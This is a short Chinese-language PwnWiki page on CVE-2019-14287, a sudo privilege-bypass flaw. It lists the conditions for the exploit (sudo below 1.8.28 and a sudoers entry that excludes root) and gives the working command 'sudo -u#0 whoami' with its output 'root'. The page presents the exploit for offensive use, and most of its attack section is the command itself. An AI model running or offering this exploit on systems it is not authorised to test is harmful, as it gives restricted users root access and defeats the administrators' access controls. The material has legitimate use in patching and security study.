CVE-2019-14287 Sudo權限繞過漏洞

From PwnWiki

Revision as of 15:09, 30 April 2021 by Atsud0 (talk | contribs) (Created page with "=== Info === [https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability CVE-2019-14287 sudo Vulnerability Allows Bypass of User Restrictions] ==== 利用要求 ====...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Info

CVE-2019-14287 sudo Vulnerability Allows Bypass of User Restrictions

利用要求

sudo版本低於v1.8.28

/etc/sudoers 配置要求如下(要求一組特定權限,不一定完全是下面的樣子)

示例

<user> ALL=(ALL:!root) NOPASSWD: ALL

EXP

sudo -u#0 whoami
root

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2019-14287_Sudo權限繞過漏洞&oldid=1953"